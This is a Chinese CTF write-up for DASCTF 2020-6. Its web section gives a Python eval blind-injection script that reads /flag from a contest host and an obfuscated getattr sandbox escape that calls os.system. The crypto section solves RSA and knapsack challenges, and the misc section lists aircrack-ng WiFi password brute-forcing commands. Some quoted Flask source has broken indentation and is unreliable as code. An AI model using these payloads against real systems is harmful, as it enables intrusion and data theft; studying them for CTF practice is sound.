DASctf-2020-6

每日思考一遍人生，仍是要學習的

0x01 web

一、計算器-1

源碼：

 1 #!/usr/bin/env python3
 2 # -*- coding: utf-8 -*- 
 3 from flask import Flask, render_template, request,session 
 4 from config import black_list,create 
 5 import os 
 6 app = Flask(__name__) 
 7 app.config['SECRET_KEY'] = os.urandom(24) 
 8 ## flag is in /flag try to get it 
 9 @app.route('/', methods=['GET', 'POST']) 
10 def index(): 
11     def filter(string): 
12         for black_word in black_list: 
13             if black_word in string: 
14                 return "hack" 
15     return string 
16     if request.method == 'POST': 
17         input = request.form['input'] 
18         create_question = create() 
19         input_question = session.get('question') 
20         session['question'] = create_question 
21         if input_question==None: 
22             return render_template('index.html', answer="Invalid session please try again!", question=create_question) 
23         if filter(input)=="hack": 
24             return render_template('index.html', answer="hack", question=create_question) 
25         try: calc_result = str((eval(input_question + "=" + str(input)))) 
26         if calc_result == 'True': 
27             result = "Congratulations" 
28         elif calc_result == 'False': 
29             result = "Error" 
30         else: 
31             result = "Invalid" 
32         except: 
33             result = "Invalid" 
34             return render_template('index.html', answer=result,question=create_question) 
35 
36     if request.method == 'GET': 
37         create_question = create() 
38         session['question'] = create_question 
39         return render_template('index.html',question=create_question) 
40 
41 @app.route('/source') 
42 def source(): 
43     return open("app.py", "r").read() 
44     if __name__ == '__main__': 
45         app.run(host="0.0.0.0", debug=False) 

View Code

簡單理解一下，就是eval執行輸入字符串，再返回結果，他還告訴咱們flag在/flag裏

 try: calc_result = str((eval(input_question + "=" + str(input))))  

可利用python 布爾盲注，簡單的來講就是讀flag文件，而後一個個試而後經過回顯判斷

import requests
import re
from urllib.parse import quote as urlencode

def main():
    alphabet = ['{','}', '@', '_',',','a','b','c','d','e','f','j','h','i','g','k','l','m','n','o','p','q','r','s','t','u','v','w','x','y','z','A','B','C','D','E','F','G','H','I','G','K','L','M','N','O','P','Q','R','S','T','U','V','W','X','Y','Z','0','1','2','3','4','5','6','7','8','9']
    proxies={'http':'http://127.0.0.1:8080','https':'https://127.0.0.1:8080'}  
    data={"input":""}
    s = requests.Session()

    flag = ''
    for i in range(0,100):
        for char in alphabet:
            try:
                # get(question)
                r = s.post("http://183.129.189.60:10026/", data={"input":""})
                question = re.search(r"<h4>(.*)</h4>", r.content.decode(), re.M|re.I).group().replace("<h4>", "").replace("</h4>","")[:-1]
                # print(question)
                data["input"] = "{0} and '{2}'==(open('/flag','r').read()[{1}])".format(question, i, char)
                r = s.post("http://183.129.189.60:10026/", data=data, proxies=proxies)
                result = r.content.decode()
                # print(char, end=' ')
                # print(re.search(r"<h3>(.*)</h3>", result, re.M|re.I).group())
                # print(data)
                if r"Congratulations" in result:
                    flag += char
                    print(flag)
                    break
            except Exception as e:
                print("Exception: ", end='')
                print(e)

if __name__ == '__main__':
    main()

學到的：1）re.M,具體參考http://www.javashuo.com/article/p-ctixjckb-o.html

2）{0},意會

關於ctf：python eval的布爾盲注

二、計算器-2

源碼：

#!/usr/bin/env python3
# -*- coding: utf-8 -*-
from flask import Flask, render_template, request,session
#from config import black_list,create
import os
app = Flask(__name__)
app.config['SECRET_KEY'] = os.urandom(24)

black_list = ['os','12']

## flag is in /flag try to get it
@app.route('/', methods=['GET', 'POST'])
def index():
    def filter(string):
        for black_word in black_list:
            if black_word in string:
                return "hack"
        return string

    if request.method == 'POST':
        input = request.form['input']
        create_question = create()
        input_question = session.get('question')
        session['question'] = create_question
        if input_question == None:
            return render_template('index.html', answer="Invalid session please try again!", question=create_question) 

        if filter(input)=="hack":
            return render_template('index.html', answer="hack", question=create_question)

        calc_str = input_question + "=" + str(input)
        try:
            calc_result = str((eval(calc_str)))//
        except Exception as ex:
            calc_result = "Invalid"
            return render_template('index.html', answer=calc_result,question=create_question)

    if request.method == 'GET':
        create_question = create()
        session['question'] = create_question
        return render_template('index.html',question=create_question)


@app.route('/source')
    def source():
        return open("app.py", "r").read()

    if __name__ == '__main__':
        app.run(host="0.0.0.0", debug=False)

View Code

沙箱逃逸參考：https://www.freebuf.com/column/232197.html的第三個

元素鏈調用構造過程：https://www.mi1k7ea.com/2019/05/31/Python%E6%B2%99%E7%AE%B1%E9%80%83%E9%80%B8%E5%B0%8F%E7%BB%93/

利用getattr()繞過過濾(通常用來繞過.)：

getattr(getattr(getattr(getattr(getattr(getattr(getattr([],'__cla'+'ss__'),'__mr'+'o__')[1],'__subclas'+'ses__')()[104],'__init__'),'__glob'+'al'+'s__')['sy'+'s'],'mod'+'ules')['o'+'s'],'sy'+'ste'+'m')('l'+'s')

getattr:返回一個對象屬性值。

返回class對象，再返回class的__mro__，結合元素鏈構造

反彈shell

一句話反彈shell：http://www.javashuo.com/article/p-xnodmndl-cx.html

詳細一些:https://www.cnblogs.com/r00tgrok/p/reverse_shell_cheatsheet.html

終於找到了一個帶實驗的：http://www.javashuo.com/article/p-ddqlavso-eh.html

被攻擊者：其中192.168.220.128爲攻擊者IP

攻擊者

(先開啓監聽)

 有關該題目的反彈shell

os.system裏面能夠執行系統命令

關於爲何別人的php調用python正常輸出，個人啥也沒有，還沒找到緣由：

http://www.javashuo.com/article/p-wehtsfaw-mx.html

 

其餘的web題沒看。。。。

0x02 Crypto

一、Gemini_Man

給了倆數，N and C，RSA，N很大，而後好像還給了提示，孿生素數（反正我沒看到）,猜想q=p+2,可求出p，q

e是猜的65537。。。。

from gmpy2 import *
n='*******'
c='*******'
p = iroot(n,2)[0] #求n的2次根
q=p+2
print(p*q == n)
phi = (p-1)*(q-1)
e = 65537

print("d.....")
d = invert(e,phi)
print("m.....")

m = int(powmod(c,d,n))
print("flag....")
flag = bytes.fromhex(hex(m).strip("0xL"))
print(flag)
# b'Nep{e540b1fd7d4459619eecd244c12ae5c4}'

View Code

二、HardKnapsack1

import hashlib
a0 = 780007910488861179164293870887
a1 = 644757781267431438527370588084
a2 = 886344987910700007796700699622
a3 = 67037192443258799119898868140
a4 = 315956500273241342245431683326
a5 = 351211073412604835884630475291
a6 = 335995606663513190145190482978
a7 = 297359033781432237886700807123
a8 = 830856741522978372146275766502
a9 = 66237663505632806581378309121
a10 = 215381734735218549313962033405
a11 = 901490788983193928886516147592
a12 = 499548714837069155558450537001
a13 = 224630055332830997824601426897
a14 = 919172894051797483753355195026
a15 = 1245440331898780823251731300504
a16 = 298263995223321209902868895182
a17 = 736591430769582414355553278342
a18 = 1217976030016671115168136964102
a19 = 980399099884318297365025522271
a20 = 726084355132965753252062504988
a21 = 951277826840378766945561669930
a22 = 7492442200302555390486229208
a23 = 769018513342604618159516970070
a24 = 968152198590814209754881322238
a25 = 1175154665753017160833066426121
a26 = 451952196471082603080565175017
a27 = 1221094023689255701171287330816
a28 = 617456087916724185254283878151
a29 = 226112898226641715564773252737
a30 = 494810212661607333752928148148
a31 = 1244821663551343141356670958981
a32 = 679214190369761834097630749359
a33 = 745058412645059179660418453044
a34 = 1178229830813633913730449092984
a35 = 145802775498878544007250617349
a36 = 1120246265160574187528207432153
a37 = 879947206559082641568587869322
a38 = 694829766294593284811782637743
a39 = 27254432667363032997310672464
a40 = 659494232598071549477042457760
a41 = 246528894190618505904569471972
a42 = 678865008088637501445062252585
a43 = 338808883115188328216917974008

s = 7435339872422467409289909942435

from flag import FLAG, m
alist = []
for i in range(44):
    eval("alist.append({})".format('a' + str(i)))
ss = 0
for i in range(len(m)):
    assert (int(m[i]) == 1 or int(m[i]) == 0)
    ss += alist[i] * int(m[i])
assert(ss == s)

assert(hashlib.md5(m.encode()).hexdigest() == FLAG)

View Code

就是一個44位的m列表，其中的數爲0或者爲1，爲1就把對應的a[i]加起來，而後給了個加起來的結果，以及a列表，求出m便可獲得flag，下次仍是要百度題目，不要相信本身的想法

揹包加密：https://lazzzaro.github.io/2020/05/13/crypto-%E5%85%B6%E4%BB%96%E5%8A%A0%E5%AF%86%E7%AE%97%E6%B3%95/#Merkle-Hellman%E8%83%8C%E5%8C%85%E5%8A%A0%E5%AF%86

LLL算法：用來破解揹包密碼的就對了（代碼竟然不能直接用？）

from hashlib import *
from sage.all import *
a = [780007910488861179164293870887, 644757781267431438527370588084, 886344987910700007796700699622, 67037192443258799119898868140, 315956500273241342245431683326, 351211073412604835884630475291, 335995606663513190145190482978, 297359033781432237886700807123, 830856741522978372146275766502, 66237663505632806581378309121, 215381734735218549313962033405, 901490788983193928886516147592, 499548714837069155558450537001, 224630055332830997824601426897, 919172894051797483753355195026, 1245440331898780823251731300504, 298263995223321209902868895182, 736591430769582414355553278342, 1217976030016671115168136964102, 980399099884318297365025522271, 726084355132965753252062504988, 951277826840378766945561669930, 7492442200302555390486229208, 769018513342604618159516970070, 968152198590814209754881322238, 1175154665753017160833066426121, 451952196471082603080565175017, 1221094023689255701171287330816, 617456087916724185254283878151, 226112898226641715564773252737, 494810212661607333752928148148, 1244821663551343141356670958981, 679214190369761834097630749359, 745058412645059179660418453044, 1178229830813633913730449092984, 145802775498878544007250617349, 1120246265160574187528207432153, 879947206559082641568587869322, 694829766294593284811782637743, 27254432667363032997310672464, 659494232598071549477042457760, 246528894190618505904569471972, 678865008088637501445062252585, 338808883115188328216917974008]
s = 7435339872422467409289909942435
def decrypt(enc,publickey):
    # 維數
    n = len(publickey)
    # 構造格
    d = 2*identity_matrix(ZZ,n,n)
    col = publickey+[enc]
    col = matrix(col).transpose()
    last = matrix(ZZ,[[1]*n])
    tmp = block_matrix(ZZ,[[d],[last]])
    grid = block_matrix(ZZ,[[tmp,col]])
    # 格基規約 使用LLL算法，找到最短向量
    M = grid.LLL()
    # 利用最短向量還原信息，注意又兩種可能，這裏僅考慮第一種，reverse 函數將當前結果轉換爲第二種可能
    m = ''
    for i in M[0]:
        if i== -1:
#             m += '0'
            m += '1'
        elif i == 1:
#             m += '1'
            m += '0'
    return m

m = decrypt(s,a)
# m = '01100101000000000100010010000010000100100111'
flag = md5(m.encode()).hexdigest()
print(flag)

View Code

 

0x03 MISC

總結一下工具吧，感受質量最高的那個我也沒下載文件

1）aircrack-ng

破解wifi密碼的，給了個數據包，利用 aircrack-ng *.cap 得到wifi的essid，再利用 aircrack-ng *.cap -w password.txt (txt文件用來爆破的，github上找一下便可)爆破密碼，最後 airdecap-ng *.cap -e ESSID -p pwd 得到原始數據包


再wireshark分析一下，http協議過濾以後分析，裏面的文件分離可利用：https://blog.csdn.net/xiaopan233/article/details/89765018

分析以後有個空白txt：snow隱寫。。。。

2）內存取證volatility，均可以單另外一篇了

http://www.javashuo.com/article/p-bbfvtfne-dt.html

3）zsteg

能夠檢測PNG和BMP圖片裏的隱寫數據

4）隱形水印工具

圖片隱寫能夠查着試試

0x04 總結

無